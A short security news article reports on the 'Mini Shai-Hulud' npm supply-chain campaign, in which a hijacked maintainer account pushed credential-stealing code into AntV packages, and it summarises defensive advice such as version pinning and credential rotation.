Massive Npm Supply Chain Attack Hits AntV Ecosystem; Hundreds of JavaScript Packages Compromised

The recent “Mini Shai‑Hulud” campaign marks a new escalation in npm supply‑chain attacks, targeting the AntV ecosystem that powers data‑intensive dashboards across finance and analytics firms. By seizing the trusted maintainer account "atool," threat actors injected malicious code into high‑profile libraries such as @antv/g2 and echarts‑for‑react. This tactic leverages the npm trust model, where developers automatically accept updates from maintainers, allowing the malware to propagate across millions of downstream projects in mere minutes.

Technical analysis reveals the payload is more than a simple backdoor; it scrapes environment variables and configuration files to exfiltrate AWS access keys, GitHub tokens, Docker socket paths, and Kubernetes secrets. In exposed container environments, the code even attempts socket‑based container escapes, turning a compromised developer workstation into a foothold for lateral movement within cloud infrastructure. The rapid 22‑minute publishing window illustrates how automated dependency resolution can amplify an attack, turning a single compromised package into a worm‑like vector that traverses complex dependency graphs.

Industry response emphasizes hardening the npm ecosystem: pinning exact package versions, disabling install‑time scripts, and rotating any credentials that may have been exposed. Microsoft and leading security firms recommend continuous monitoring for anomalous outbound traffic and regular secret audits in CI/CD pipelines. The incident reinforces a broader trend—over 20% of npm packages inherit known vulnerabilities through transitive dependencies—highlighting the urgent need for supply‑chain risk management tools and stricter maintainer verification processes to protect modern JavaScript applications.